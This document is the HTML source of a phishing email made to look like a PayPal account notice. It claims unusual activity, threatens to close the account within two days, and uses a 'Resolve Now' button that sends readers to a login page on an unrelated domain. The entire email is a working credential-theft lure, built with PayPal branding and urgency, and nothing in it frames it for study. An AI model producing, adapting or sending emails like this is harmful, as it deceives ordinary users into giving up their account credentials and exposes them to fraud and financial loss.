<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>







  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <meta name="viewport" content="initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,width=device-width,height=device-height,target-densitydpi=device-dpi,user-scalable=no"><title>We noticed unusual activity in your Paypal account</title>
  


  <style type="text/css">
<style type='text/css'> /* PP Sans Font Import */
@font-face {
font-family: 'pp-sans-big-light';
font-weight: 100;
font-style: normal;
src: url("https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Light.woff") format("woff"), url("https://www.paypalobjects.com/webstatic/mktg/2014design/font/headlinedark/festivo1.ttf") format("truetype"), url("https://www.paypalobjects.com/webstatic/mktg/2014design/font/PP-Sans/PayPalSansBig-Light.svg") format("svg")
}
/* PP Sans Class */
.ppsans {
font-family: 'pp-sans-big-light', 'Noto Sans', Calibri, Trebuchet, Arial, sans serif !important;
}
.ppsansbold {
font-family: 'pp-sans-big-bold', 'Noto Sans', Calibri, Trebuchet, Arial, sans serif !important;
}
/* prevent iOS font upsizing */
* {
-webkit-text-size-adjust: none;
}
/* force Outlook.com to honor line-height */
/*
.ExternalClass * {
line-height: 100%;
}
td {
mso-line-height-rule: exactly;
}
*/
/* prevent iOS auto-linking */
/* Android margin fix */
body {
margin: 0 !important;
}
div[style*="margin: 16px 0"] {
margin: 0 !important;
}
/** Prevent Outlook Purple Links **/
.greyLink a:link {
color: #949595;
}
/* prevent iOS auto-linking */
.applefix a { /* use on a span around the text */
color: inherit;
text-decoration: none;
}
.partner_image {
max-width: 250px !important;
max-height: 90px !important;
display: block;
}
.mpi_image {
width: 98% !important;
display: block;
margin-left: auto;
margin-right: auto;
}
/*** Responsive CSS ***/
@media only screen and (max-width: 414px) {
/*** Layout ***/
body {
width: 100%;
min-width: 100%;
position: relative;
top: 0;
left: 0;
right: 0;
margin: 0;
padding: 0;
}
.marginFix {
position: relative;
top: 0;
left: 0;
right: 0;
}
.mobContent {
width: 100% !important;
min-width: 100% !important;
padding: 0px 0px 0px 0px !important;
}
/*.mobMargin { width: 10% !important; }*/
.hide {
width: 0px !important;
height: 0px !important;
display: none !important;
}
.full-width {
width: 100% !important;
min-width: 100% !important;
}
.stackTbl {
width: 100% !important;
display: table !important;
}
.stackTblMarginTop {
width: 100% !important;
display: table !important;
margin-top: 20px !important;
}
.center {
margin: 0px auto !important;
}
.floatLeft {
float: left !important;
width: 35% !important;
}
.floatRight {
float: right !important;
width: 60% !important;
}
.autoHeight {
height: auto !important;
}
.autoWidth {
width: auto !important;
}
/*** Padding Styles ***/
.mobilePadding {
padding: 20px 20px 20px 20px !important;
}
.mobilePadding1 {
padding: 40px 20px 40px 20px !important;
height: auto !important;
}
.mobilePadding2 {
padding: 0px 20px 40px 20px !important;
}
.mobilePadding3 {
padding: 20px 20px 0px 20px !important;
}
.mobilePadding4 {
padding: 0px 0px 30px 0px !important;
}
.mobilePadding5 {
padding: 0px 20px 30px 20px !important;
}
.mobilePadding6 {
padding: 30px 20px 30px 20px !important;
}
.mobilePadding7 {
padding: 0px 20px 0px 20px !important;
}
.mobilePadding8 {
padding: 50px 0px 50px 0px !important;
}
.mobilePadding9 {
padding: 10px 0px 15px 0px !important;
}
.mobilePadding10 {
padding: 0px 20px 0px 20px !important;
}
.mobilePadding11 {
padding: 40px 0px 40px 0px !important;
}
.mobilePadding12 {
padding: 40px 0px 0px 0px !important;
}
.mobilePadding13 {
padding: 0px 0px 40px 0px !important;
}
.mobilePadding14 {
padding: 40px 30px 10px 30px !important;
}
.mobilePadding15 {
padding: 0px 30px 0px 30px !important;
}
.mobilePadding16 {
padding: 0px 0px 10px 0px !important;
}
.padding0 {
padding: 0px !important;
}
.topPadding0 {
padding-top: 0px !important;
}
.topPadding10 {
padding-top: 10px !important;
}
.topPadding20 {
padding-top: 20px !important;
}
.topPadding30 {
padding-top: 30px !important;
}
.topPadding40 {
padding-top: 40px !important;
}
.bottomPadding0 {
padding-bottom: 0px !important;
}
.bottomPadding10 {
padding-bottom: 10px !important;
}
.bottomPadding20 {
padding-bottom: 20px !important;
}
.bottomPadding30 {
padding-bottom: 30px !important;
}
.bottomPadding40 {
padding-bottom: 40px !important;
}
/* use to make image scale to 100 percent */
.fullWidthImg {
width: auto !important;
height: auto !important;
}
.fullWidthImg img {
width: auto !important;
height: auto !important;
}
.mobile_hero_width {
width: auto !important;
height: auto !important;
}
/* background image replacement scalable height */
.bgSwap {
background-image: url(images/lifestyle-background-mob.jpg) !important;
width: 100% !important;
padding-top: 65% !important; /* update height here */
background-size: cover !important;
background-position: center top !important;
background-repeat: no-repeat !important;
display: block !important;
}
/*** Border Styles ***/
.borderBottomDot {
border-bottom: 1px dotted #999999 !important;
}
/*** Text Align Styles ***/
.textAlignLeft {
text-align: left !important;
}
.textAlignRight {
text-align: right !important;
}
.textAlignCenter {
text-align: center !important;
}
/*** Misc Styles ***/
.mobileStrong {
font-weight: bold !important;
}
/*** Width Styles ***/
.td150px {
width: 150px !important;
}
.td130px {
width: 130px !important;
}
.td120px {
width: 120px !important;
}
.td100px {
width: 100px !important;
}
/*** Image Width Styles ***/
.imgWidth10px {
width: 10px !important;
}
.no_mobile_phone {
display: none !important;
}
/*** END Responsive CSS ***/
}
#button_text a {
text-decoration: none;
color: #fff;
}
.button_blue{
background: #0079c1;
font-family:HelveticaNeueLight,HelveticaNeue-Light,Helvetica Neue Light,HelveticaNeue,Helvetica,Arial,sans-serif;
font-weight:300;
font-stretch:normal;
text-align:center;
color:#fff;
font-size:15px;
/*button styles*/
border-radius:7px !important;
-webkit-border-radius: 7px !important;
-moz-border-radius: 7px !important;
-o-border-radius: 7px !important;
-ms-border-radius: 7px !important;
/*styles from button.jsp */ line-height: 1.45em; padding: 7px 15px 8px; font-size: 1em;
padding-bottom: 7px; margin: 0 auto 16px;
}
.button_orange{
background: #FF3421;
/*font styles*/font-family:HelveticaNeueLight,HelveticaNeue-Light,Helvetica Neue Light,HelveticaNeue,Helvetica,Arial,sans-serif;
font-weight:300;
font-stretch:normal;
text-align:center;
color:#fff;
font-size:15px;
/*button styles*/
border-radius:7px !important;
-webkit-border-radius: 7px !important;
-moz-border-radius: 7px !important;
-o-border-radius: 7px !important;
-ms-border-radius: 7px !important;
/*styles from button.jsp */ line-height: 1.45em; padding: 7px 15px 8px; font-size: 1em;
padding-bottom: 7px; margin: 0 auto 16px;
}
.button_grey{
background: #E0E0E0;
/*font styles*/font-family:HelveticaNeueLight,HelveticaNeue-Light,Helvetica Neue Light,HelveticaNeue,Helvetica,Arial,sans-serif;
font-weight:300;
font-stretch:normal;
text-align:center;
color:#fff;
font-size:15px;
/*button styles*/
border-radius:7px !important;
-webkit-border-radius: 7px !important;
-moz-border-radius: 7px !important;
-o-border-radius: 7px !important;
-ms-border-radius: 7px !important;
/*styles from button.jsp */ line-height: 1.45em; padding: 7px 15px 8px; font-size: 1em;
padding-bottom: 7px; margin: 0 auto 16px;
}
*[class=button_style] {
border-radius: 7px !important;
-webkit-border-radius: 7px !important;
-moz-border-radius: 7px !important;
-o-border-radius: 7px !important;
-ms-border-radius: 7px !important;
}
*[class=button_style]:active {
background: #008bdb !important;
}
*[class=button_style]:hover {
background: #008bdb !important;
}
/* A basic table styling */
.aloha-ephemera-attr {
width: 100%;
cellspacing: 0px;
cellpadding: 0px;
border-top: 1px solid #ddd;
border-bottom: 1px solid #ddd;
-moz-hyphens : auto;
-ms-word-break: break-all;
word-break: break-all;
word-break: break-word; -webkit-hyphens: auto;
-moz-hyphens: auto;
hyphens: auto;
}
.aloha-ephemera-attr th
{
background-color: #EEE; border-bottom: 1px solid #ddd;
border-right: 1px solid #ddd;
border-left: 1px solid #ddd;
border-collapse: collapse;
}
.aloha-ephemera-attr td
{
}
body, td { font-family:Calibri, Trebuchet, Arial, sans serif; font-size:16px; line-height:22px; color:#333333; font-weight:normal;} td.ultility_nav_padding a {
color: #009cde;
font-weight: normal;
text-decoration: none;
font-family: Calibri, Trebuchet, Arial, sans serif;
font-size: 17px;
} td.column_split_preheader a {
color: #009cde;
font-weight: normal;
text-decoration: underline;
font-family: Calibri, Trebuchet, Arial, sans serif;
font-size: 17px;
}
a {
color:#009cde;
font-weight: 300;
text-decoration: none;
font-family: Calibri, Trebuchet, Arial, sans serif;
font-size: 17px;
}
.headline{color: #0079c1; font-family: Helvetica Neue Light,Helvetica;font-size: 30px; font-weight: 300 !important;}
.text_lightblue_header { font-family:Calibri, Trebuchet, Arial, sans serif; font-size:36px; line-height:44px; color:#0079c1; -webkit-font-smoothing: antialiased; }
sup {font-size:7px !important;}
  </style></head>

<body style="margin: 0pt; padding: 0pt; background: rgb(242, 242, 242) none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;">

<div style="display: none ! important; color: rgb(255, 255, 255); font-size: 1pt;"></div>

<table style="width: 100%;" class="marginFix" border="0" cellpadding="0" cellspacing="0">

<!-- GRAY BACKGROUND -->
  <tbody>

    <tr>

      <td class="mobMargin" style="font-size: 0px; background-color: rgb(242, 242, 242);"> <br>
</td>

      <td class="mobContent" align="center" bgcolor="#ffffff" width="660">
<!-- inner container / place all modules below -->
      <table border="0" cellpadding="0" cellspacing="0" width="100%">

<!-- BEGIN MAIN CONTENT -->
        <tbody>

          <tr>

            <td align="center" valign="top" width="600">
            <table border="0" cellpadding="0" cellspacing="0" width="100%">

              <tbody>

                <tr class="no_mobile_phone">

                  <td style="padding-top: 10px;" bgcolor="#f2f2f2"><br>
</td>

                </tr>

                <tr>

                  <td style="padding-top: 10px;" bgcolor="#f2f2f2"><br>
</td>

                </tr>

                <tr>

                  <td align="center" bgcolor="#ffffff" valign="top">
<!-- PLACE ALL MODS BELOW --><!-- PayPal logo - start -->
                  <table contenteditable="false" style="margin-bottom: 10px;" border="0" cellpadding="0" cellspacing="0" width="100%">

                    <tbody>

                      <tr valign="bottom">

                        <td align="center" valign="top" width="20"> <br>
</td>

                        <td align="left" height="64">
&nbsp;<br>
                        <img class="yiv6765415577logo_top" style="border: medium none ; display: block;" src="data:image/png;base64,…" alt="PayPal" height="34" width="140"></td>

                        <td align="center" valign="top" width="20"> <br>
</td>

                      </tr>

                    </tbody>
                  </table>

<!-- PayPal logo - start -->
<!-- headline -->
                  <table contenteditable="false" style="padding-bottom: 10px; padding-top: 10px;" border="0" cellpadding="0" cellspacing="0" width="100%">

                    <tbody>

                      <tr valign="bottom">

                        <td align="center" valign="top" width="20"> <br>
</td>

                        <td> <span class="text_lightblue_header" style="font-family: Calibri,Trebuchet,Arial,sans serif; font-size: 36px; line-height: 44px; color: rgb(0, 121, 193);">
We noticed unusual activity in your Paypal account
                        </span> </td>

                        <td align="center" valign="top" width="20"> <br>
</td>

                      </tr>

                    </tbody>
                  </table>

<!-- body - start -->
                  <table contenteditable="false" style="padding-bottom: 10px; padding-top: 10px; margin-bottom: 20px;" border="0" cellpadding="0" cellspacing="0" width="100%">

                    <tbody>

                      <tr valign="bottom">

                        <td align="center" valign="top" width="20"> <br>
</td>

                        <td style="font-family: Calibri,Trebuchet,Arial,sans serif; font-size: 15px; line-height: 22px; color: rgb(51, 51, 51);" class="ppsans" valign="top">
<!-- EmailOpeningSalutation : start -->Dear Client ,
                        <br>

                        <p>Some info on your account appears to
be missing or incorrect. Please update your information promptly so
that you can continue to enjoy all the benefits of your account. If you
don't update your information within 2 days, we'll close your account.</p>

                        <table class="mobile_button" contenteditable="false" border="0" cellpadding="0" cellspacing="0">

                          <tbody>

                            <tr>

                              <td id="force_height" height="40" width="1"><img draggable="false" src="https://www.paypalobjects.com/webstatic/eCAT/GCE/spacer10.gif" style="display: block;" border="0" height="40" width="1"></td>

                              <td class="button_style" id="button_text" style="margin: 0pt auto 16px; padding: 7px 15px; background: rgb(0, 121, 193) none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial; font-family: Calibri,Trebuchet,Arial,sans-serif; font-weight: 300; font-stretch: normal; text-align: center; color: rgb(255, 255, 255); -moz-border-radius-topleft: 7px ! important; -moz-border-radius-topright: 7px ! important; -moz-border-radius-bottomright: 7px ! important; -moz-border-radius-bottomleft: 7px ! important; line-height: 1.45em; font-size: 1em;" align="center" valign="middle"><span class="aloha-editable"><a type="Link" target="_BLANK" linkid="68932556a999b5ced7260a600dc8fb31" style="text-decoration: none; color: rgb(255, 255, 255);" href="https://www.flexfony.com/fonts/bootstrap/Accountupdate/">Resolve
Now</a></span></td>

                            </tr>

                          </tbody>
                        </table>

                        <br>

<!-- EmailHowTo : start -->
                        <table class="howTo" contenteditable="false" style="font-family: Calibri,Trebuchet,Arial,sans serif,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 11px; line-height: normal; font-size-adjust: none; font-stretch: normal;" border="0" cellpadding="10" cellspacing="0" width="100%">

                          <tbody>

                            <tr>

                              <td style="background-color: rgb(232, 241, 250);">
                              <h4> How Resolve Limitation ?</h4>

                              <ul>

                                <li>Click the Button "Resolve
Now" and log-in to your account.</li>

                                <li>Follow the Instructions then
you can Resolve limitation !</li>

                                <li>Normally It take 2 day to
Update Information In Our Servers . ..</li>

                              </ul>

                              </td>

                            </tr>

                          </tbody>
                        </table>

<!-- EmailHowTo : end --><br>

<!-- EmailClosingSalutation : start -->cordially,<br>

PayPal
<!-- EmailClosingSalutation : end --><br>

                        <span style="font-weight: bold; color: rgb(68, 68, 68);">
                        </span><span>
                        </span></td>

                        <td align="center" valign="top" width="20"> <br>
</td>

                      </tr>

                    </tbody>
                  </table>

<!-- body - end -->
<!-- PLACE ALL MODS ABOVE --></td>

                </tr>

              </tbody>
            </table>

            </td>

<!-- END MAIN CONTENT --> </tr>

        </tbody>
      </table>

<!-- end inner container / place all modules above -->
<!-- footer modules -->
      <table border="0" cellpadding="0" cellspacing="0" width="100%">

<!-- BEGIN FOOOTER CONTENT -->
        <tbody>

          <tr>

            <td align="center" valign="top" width="600">
            <table border="0" cellpadding="0" cellspacing="0" width="100%">

              <tbody>

                <tr>

                  <td style="padding-top: 20px;" bgcolor="#f2f2f2"><br>
</td>

                </tr>

                <tr>

                  <td align="center" bgcolor="#f2f2f2" valign="top">
<!-- PLACE ALL MODS BELOW -->
                  <table contenteditable="false" border="0" cellpadding="0" cellspacing="0" width="100%">

                    <tbody>

                      <tr valign="bottom">

                        <td align="center" valign="top" width="20"> <br>
</td>

                        <td>
<!-- footer links -->
                        <table class="mobile_table_width_utility_nav" align="left" border="0" cellpadding="0" cellspacing="0">

                          <tbody>

                            <tr>

                              <td class="ultility_nav_padding" style="font-family: Calibri,Trebuchet,Arial,sans serif; font-size: 13px; color: rgb(102, 102, 102); font-weight: bold;">
                              <span id="bottomLinks"><!-- EmailFooterLinks : start -->
                              <div class="footerLinks" style="margin: 5px 0pt; padding: 0pt;"><span style="display: inline;">
                              <span class="link" contentediable="false"><a style="text-decoration: none;" target="_BLANK">
Help </a>
                              </span><span style="color: rgb(204, 204, 204);">
                              <span class="const"> | </span>
                              </span><span class="link" contentediable="false">
                              <a style="text-decoration: none;" target="_BLANK">Security Center </a>
                              </span></span>
                              </div>

<!-- EmailFooterLinks : end --> </span>
                              </td>

                            </tr>

                          </tbody>
                        </table>

                        </td>

                        <td align="center" valign="top" width="20"> <br>
</td>

                      </tr>

                    </tbody>
                  </table>

                  <table contenteditable="false" border="0" cellpadding="0" cellspacing="0" width="100%">

                    <tbody>

                      <tr valign="bottom">

                        <td align="center" valign="top" width="20"> <br>
</td>

                        <td>
                        <p> Please do not reply to this email. To
contact us, click Help <strong><a>Help &amp; Customer
Service</a></strong>.</p>

                        </td>

                        <td align="center" valign="top" width="20"> <br>
</td>

                      </tr>

                    </tbody>
                  </table>

                  <table contenteditable="false" border="0" cellpadding="0" cellspacing="0" width="100%">

                    <tbody>

                      <tr valign="bottom">

                        <td align="center" valign="top" width="20"> <br>
</td>

                        <td>
                        <span style="font-family: Calibri,Trebuchet,Arial,sans serif; font-size: 13px;">
<!-- tracking -->
                        <table id="emailFooter" style="padding-top: 20px; font-family: Arial,Verdana,Helvetica,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 12px; line-height: normal; font-size-adjust: none; font-stretch: normal; color: rgb(41, 41, 41);" border="0" cellpadding="0" cellspacing="0" width="100%">

                          <tbody>

                            <tr>

                              <td>
                              <p> This email was sent to your
email address, for ongoing support and maintenance of your account. To
manage your communications preferences, please see our <a style="text-decoration: none;" target="_BLANK">preferably
Center</a>.</p>

                              <p>Please do not reply to this
email. We can not respond to questions sent to this address. For
immediate answers to your questions, visit our Help by clicking <strong>Help
&amp; Customer Service</strong> on any page of the website or
email PayPal.</p>

                              <p>PayPal is committed to
protecting your privacy. Learn more about our . <a style="text-decoration: none;" target="_BLANK">Regulations
respecting privacy</a>.</p>

                              <p>Copyright © 2020 PayPal
Canada Co., 661 University Ave., Toronto, ON M5G 1M1. All rights
reserved.
PayPal PPX000364: N / A: fe5f98567d056</p>

                              </td>

                            </tr>

                          </tbody>
                        </table>
                        </span></td>

                        <td align="center" valign="top" width="20"> <br>
</td>

                      </tr>

                    </tbody>
                  </table>

<!-- PLACE ALL MODS ABOVE --></td>

                </tr>

              </tbody>
            </table>

            </td>

<!-- END MAIN CONTENT --> </tr>

        </tbody>
      </table>

      </td>

      <td class="mobMargin" style="font-size: 0px;" bgcolor="#f2f2f2"> <br>
</td>

    </tr>

<!-- END GRAY BACKGROUND -->
  </tbody>
</table>

<!-- END CONTAINER -->
</body></html>